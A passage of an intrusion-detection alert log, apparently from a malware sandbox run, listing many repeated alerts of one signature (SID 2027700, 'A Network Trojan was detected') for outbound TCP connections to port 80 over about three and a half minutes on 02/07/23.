                            Timestamp:192.168.2.562.204.41.449747802027700 02/07/23-19:57:17.384762
                            SID:2027700
                            Source Port:49747
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449788802027700 02/07/23-19:57:28.836185
                            SID:2027700
                            Source Port:49788
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450099802027700 02/07/23-19:58:53.985606
                            SID:2027700
                            Source Port:50099
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450283802027700 02/07/23-19:59:45.895142
                            SID:2027700
                            Source Port:50283
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450153802027700 02/07/23-19:59:09.775607
                            SID:2027700
                            Source Port:50153
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450194802027700 02/07/23-19:59:19.434056
                            SID:2027700
                            Source Port:50194
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450408802027700 02/07/23-20:00:18.376566
                            SID:2027700
                            Source Port:50408
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449861802027700 02/07/23-19:57:49.861421
                            SID:2027700
                            Source Port:49861
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449903802027700 02/07/23-19:57:59.838875
                            SID:2027700
                            Source Port:49903
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449991802027700 02/07/23-19:58:23.361807
                            SID:2027700
                            Source Port:49991
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450058802027700 02/07/23-19:58:41.573761
                            SID:2027700
                            Source Port:50058
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449950802027700 02/07/23-19:58:13.249773
                            SID:2027700
                            Source Port:49950
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449725802027700 02/07/23-19:57:11.991747
                            SID:2027700
                            Source Port:49725
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449918802027700 02/07/23-19:58:03.708587
                            SID:2027700
                            Source Port:49918
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450053802027700 02/07/23-19:58:40.354567
                            SID:2027700
                            Source Port:50053
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450344802027700 02/07/23-20:00:01.675171
                            SID:2027700
                            Source Port:50344
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449823802027700 02/07/23-19:57:37.077825
                            SID:2027700
                            Source Port:49823
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450148802027700 02/07/23-19:59:08.546698
                            SID:2027700
                            Source Port:50148
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450442802027700 02/07/23-20:00:28.613580
                            SID:2027700
                            Source Port:50442
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449841802027700 02/07/23-19:57:41.479215
                            SID:2027700
                            Source Port:49841
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449997802027700 02/07/23-19:58:26.812666
                            SID:2027700
                            Source Port:49997
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450460802027700 02/07/23-20:00:32.743842
                            SID:2027700
                            Source Port:50460
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449851802027700 02/07/23-19:57:45.497082
                            SID:2027700
                            Source Port:49851
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450264802027700 02/07/23-19:59:39.205304
                            SID:2027700
                            Source Port:50264
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450025802027700 02/07/23-19:58:33.797119
                            SID:2027700
                            Source Port:50025
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450166802027700 02/07/23-19:59:12.953354
                            SID:2027700
                            Source Port:50166
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450377802027700 02/07/23-20:00:10.926718
                            SID:2027700
                            Source Port:50377
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450007802027700 02/07/23-19:58:29.284926
                            SID:2027700
                            Source Port:50007
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450081802027700 02/07/23-19:58:49.575685
                            SID:2027700
                            Source Port:50081
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450359802027700 02/07/23-20:00:06.547654
                            SID:2027700
                            Source Port:50359
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450086802027700 02/07/23-19:58:50.782617
                            SID:2027700
                            Source Port:50086
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450282802027700 02/07/23-19:59:45.658356
                            SID:2027700
                            Source Port:50282
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450203802027700 02/07/23-19:59:22.078648
                            SID:2027700
                            Source Port:50203
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449954802027700 02/07/23-19:58:14.184522
                            SID:2027700
                            Source Port:49954
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449758802027700 02/07/23-19:57:19.484125
                            SID:2027700
                            Source Port:49758
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450043802027700 02/07/23-19:58:37.945632
                            SID:2027700
                            Source Port:50043
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450002802027700 02/07/23-19:58:27.980529
                            SID:2027700
                            Source Port:50002
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450221802027700 02/07/23-19:59:28.870563
                            SID:2027700
                            Source Port:50221
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449946802027700 02/07/23-19:58:12.312159
                            SID:2027700
                            Source Port:49946
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450316802027700 02/07/23-19:59:53.881599
                            SID:2027700
                            Source Port:50316
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450470802027700 02/07/23-20:00:35.113671
                            SID:2027700
                            Source Port:50470
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449969802027700 02/07/23-19:58:17.745575
                            SID:2027700
                            Source Port:49969
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450020802027700 02/07/23-19:58:32.557219
                            SID:2027700
                            Source Port:50020
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449928802027700 02/07/23-19:58:08.200692
                            SID:2027700
                            Source Port:49928
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450061802027700 02/07/23-19:58:42.609485
                            SID:2027700
                            Source Port:50061
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449768802027700 02/07/23-19:57:21.340554
                            SID:2027700
                            Source Port:49768
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449987802027700 02/07/23-19:58:22.091332
                            SID:2027700
                            Source Port:49987
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450292802027700 02/07/23-19:59:48.086269
                            SID:2027700
                            Source Port:50292
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449763802027700 02/07/23-19:57:20.363784
                            SID:2027700
                            Source Port:49763
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449964802027700 02/07/23-19:58:16.564709
                            SID:2027700
                            Source Port:49964
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450369802027700 02/07/23-20:00:08.954484
                            SID:2027700
                            Source Port:50369
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450387802027700 02/07/23-20:00:13.346042
                            SID:2027700
                            Source Port:50387
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449786802027700 02/07/23-19:57:28.358002
                            SID:2027700
                            Source Port:49786
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449982802027700 02/07/23-19:58:20.917525
                            SID:2027700
                            Source Port:49982
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450091802027700 02/07/23-19:58:52.034089
                            SID:2027700
                            Source Port:50091
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450211802027700 02/07/23-19:59:26.414967
                            SID:2027700
                            Source Port:50211
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449959802027700 02/07/23-19:58:15.371241
                            SID:2027700
                            Source Port:49959
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450404802027700 02/07/23-20:00:17.416361
                            SID:2027700
                            Source Port:50404
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449800802027700 02/07/23-19:57:31.745131
                            SID:2027700
                            Source Port:49800
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450033802027700 02/07/23-19:58:35.799544
                            SID:2027700
                            Source Port:50033
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450030802027700 02/07/23-19:58:35.059294
                            SID:2027700
                            Source Port:50030
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450367802027700 02/07/23-20:00:08.484564
                            SID:2027700
                            Source Port:50367
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450382802027700 02/07/23-20:00:12.143005
                            SID:2027700
                            Source Port:50382
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450189802027700 02/07/23-19:59:18.468588
                            SID:2027700
                            Source Port:50189
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450459802027700 02/07/23-20:00:32.490579
                            SID:2027700
                            Source Port:50459
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449956802027700 02/07/23-19:58:14.672244
                            SID:2027700
                            Source Port:49956
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450107802027700 02/07/23-19:58:55.941894
                            SID:2027700
                            Source Port:50107
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450339802027700 02/07/23-19:59:59.425942
                            SID:2027700
                            Source Port:50339
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450048802027700 02/07/23-19:58:39.136453
                            SID:2027700
                            Source Port:50048
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449778802027700 02/07/23-19:57:24.022380
                            SID:2027700
                            Source Port:49778
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449892802027700 02/07/23-19:57:57.200519
                            SID:2027700
                            Source Port:49892
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450241802027700 02/07/23-19:59:33.653837
                            SID:2027700
                            Source Port:50241
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450397802027700 02/07/23-20:00:15.752527
                            SID:2027700
                            Source Port:50397
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450440802027700 02/07/23-20:00:28.144249
                            SID:2027700
                            Source Port:50440
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450226802027700 02/07/23-19:59:30.062964
                            SID:2027700
                            Source Port:50226
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449821802027700 02/07/23-19:57:36.603814
                            SID:2027700
                            Source Port:49821
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450063802027700 02/07/23-19:58:43.919705
                            SID:2027700
                            Source Port:50063
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449773802027700 02/07/23-19:57:22.545756
                            SID:2027700
                            Source Port:49773
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450318802027700 02/07/23-19:59:54.361124
                            SID:2027700
                            Source Port:50318
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449913802027700 02/07/23-19:58:02.266316
                            SID:2027700
                            Source Port:49913
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449992802027700 02/07/23-19:58:23.691995
                            SID:2027700
                            Source Port:49992
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449995802027700 02/07/23-19:58:25.960796
                            SID:2027700
                            Source Port:49995
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450354802027700 02/07/23-20:00:05.364849
                            SID:2027700
                            Source Port:50354
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449735802027700 02/07/23-19:57:14.444183
                            SID:2027700
                            Source Port:49735
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449776802027700 02/07/23-19:57:23.344979
                            SID:2027700
                            Source Port:49776
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450432802027700 02/07/23-20:00:26.215534
                            SID:2027700
                            Source Port:50432
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450313802027700 02/07/23-19:59:53.159401
                            SID:2027700
                            Source Port:50313
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449854802027700 02/07/23-19:57:48.147586
                            SID:2027700
                            Source Port:49854
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450395802027700 02/07/23-20:00:15.267609
                            SID:2027700
                            Source Port:50395
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450005802027700 02/07/23-19:58:28.753873
                            SID:2027700
                            Source Port:50005
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449984802027700 02/07/23-19:58:21.387139
                            SID:2027700
                            Source Port:49984
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450176802027700 02/07/23-19:59:15.314802
                            SID:2027700
                            Source Port:50176
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449813802027700 02/07/23-19:57:34.897396
                            SID:2027700
                            Source Port:49813
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450135802027700 02/07/23-19:59:05.579215
                            SID:2027700
                            Source Port:50135
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449926802027700 02/07/23-19:58:07.720137
                            SID:2027700
                            Source Port:49926
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449707802027700 02/07/23-19:57:08.383912
                            SID:2027700
                            Source Port:49707
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450071802027700 02/07/23-19:58:47.153403
                            SID:2027700
                            Source Port:50071
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450254802027700 02/07/23-19:59:36.757803
                            SID:2027700
                            Source Port:50254
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450326802027700 02/07/23-19:59:56.296800
                            SID:2027700
                            Source Port:50326
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450290802027700 02/07/23-19:59:47.592742
                            SID:2027700
                            Source Port:50290
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449748802027700 02/07/23-19:57:17.627780
                            SID:2027700
                            Source Port:49748
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449967802027700 02/07/23-19:58:17.264761
                            SID:2027700
                            Source Port:49967
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450076802027700 02/07/23-19:58:48.365768
                            SID:2027700
                            Source Port:50076
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450295802027700 02/07/23-19:59:48.802433
                            SID:2027700
                            Source Port:50295
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450213802027700 02/07/23-19:59:26.928062
                            SID:2027700
                            Source Port:50213
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450035802027700 02/07/23-19:58:36.040025
                            SID:2027700
                            Source Port:50035
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449789802027700 02/07/23-19:57:29.074930
                            SID:2027700
                            Source Port:49789
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450056802027700 02/07/23-19:58:41.093535
                            SID:2027700
                            Source Port:50056
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450145802027700 02/07/23-19:59:07.823731
                            SID:2027700
                            Source Port:50145
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449783802027700 02/07/23-19:57:27.313901
                            SID:2027700
                            Source Port:49783
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449933802027700 02/07/23-19:58:09.387568
                            SID:2027700
                            Source Port:49933
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449961802027700 02/07/23-19:58:15.841480
                            SID:2027700
                            Source Port:49961
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449844802027700 02/07/23-19:57:42.215376
                            SID:2027700
                            Source Port:49844
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450111802027700 02/07/23-19:58:56.896574
                            SID:2027700
                            Source Port:50111
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450463802027700 02/07/23-20:00:33.458704
                            SID:2027700
                            Source Port:50463
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450117802027700 02/07/23-19:58:58.328195
                            SID:2027700
                            Source Port:50117
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450469802027700 02/07/23-20:00:34.879330
                            SID:2027700
                            Source Port:50469
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449755802027700 02/07/23-19:57:18.963514
                            SID:2027700
                            Source Port:49755
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450200802027700 02/07/23-19:59:20.859043
                            SID:2027700
                            Source Port:50200
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450206802027700 02/07/23-19:59:23.596825
                            SID:2027700
                            Source Port:50206
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449951802027700 02/07/23-19:58:13.482140
                            SID:2027700
                            Source Port:49951
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450285802027700 02/07/23-19:59:46.406219
                            SID:2027700
                            Source Port:50285
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449939802027700 02/07/23-19:58:10.592369
                            SID:2027700
                            Source Port:49939
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450022802027700 02/07/23-19:58:33.047755
                            SID:2027700
                            Source Port:50022
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450374802027700 02/07/23-20:00:10.203248
                            SID:2027700
                            Source Port:50374
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449905802027700 02/07/23-19:58:00.330109
                            SID:2027700
                            Source Port:49905
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450196802027700 02/07/23-19:59:19.903167
                            SID:2027700
                            Source Port:50196
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450066802027700 02/07/23-19:58:45.929274
                            SID:2027700
                            Source Port:50066
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450351802027700 02/07/23-20:00:04.658670
                            SID:2027700
                            Source Port:50351
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450173802027700 02/07/23-19:59:14.605094
                            SID:2027700
                            Source Port:50173
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450392802027700 02/07/23-20:00:14.550844
                            SID:2027700
                            Source Port:50392
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449816802027700 02/07/23-19:57:35.633778
                            SID:2027700
                            Source Port:49816
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450262802027700 02/07/23-19:59:38.726303
                            SID:2027700
                            Source Port:50262
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449793802027700 02/07/23-19:57:30.034311
                            SID:2027700
                            Source Port:49793
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450084802027700 02/07/23-19:58:50.307278
                            SID:2027700
                            Source Port:50084
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449882802027700 02/07/23-19:57:54.716706
                            SID:2027700
                            Source Port:49882
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450257802027700 02/07/23-19:59:37.493308
                            SID:2027700
                            Source Port:50257
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449704802027700 02/07/23-19:57:06.319925
                            SID:2027700
                            Source Port:49704
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449923802027700 02/07/23-19:58:06.395394
                            SID:2027700
                            Source Port:49923
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449971802027700 02/07/23-19:58:18.215583
                            SID:2027700
                            Source Port:49971
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450127802027700 02/07/23-19:59:00.745196
                            SID:2027700
                            Source Port:50127
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450323802027700 02/07/23-19:59:55.559779
                            SID:2027700
                            Source Port:50323
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450412802027700 02/07/23-20:00:19.610273
                            SID:2027700
                            Source Port:50412
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449727802027700 02/07/23-19:57:12.532928
                            SID:2027700
                            Source Port:49727
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450168802027700 02/07/23-19:59:13.420495
                            SID:2027700
                            Source Port:50168
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450038802027700 02/07/23-19:58:36.760813
                            SID:2027700
                            Source Port:50038
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450234802027700 02/07/23-19:59:31.956332
                            SID:2027700
                            Source Port:50234
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449745802027700 02/07/23-19:57:16.898023
                            SID:2027700
                            Source Port:49745
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450216802027700 02/07/23-19:59:27.644779
                            SID:2027700
                            Source Port:50216
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450364802027700 02/07/23-20:00:07.781571
                            SID:2027700
                            Source Port:50364
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450435802027700 02/07/23-20:00:26.957152
                            SID:2027700
                            Source Port:50435
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450453802027700 02/07/23-20:00:31.268227
                            SID:2027700
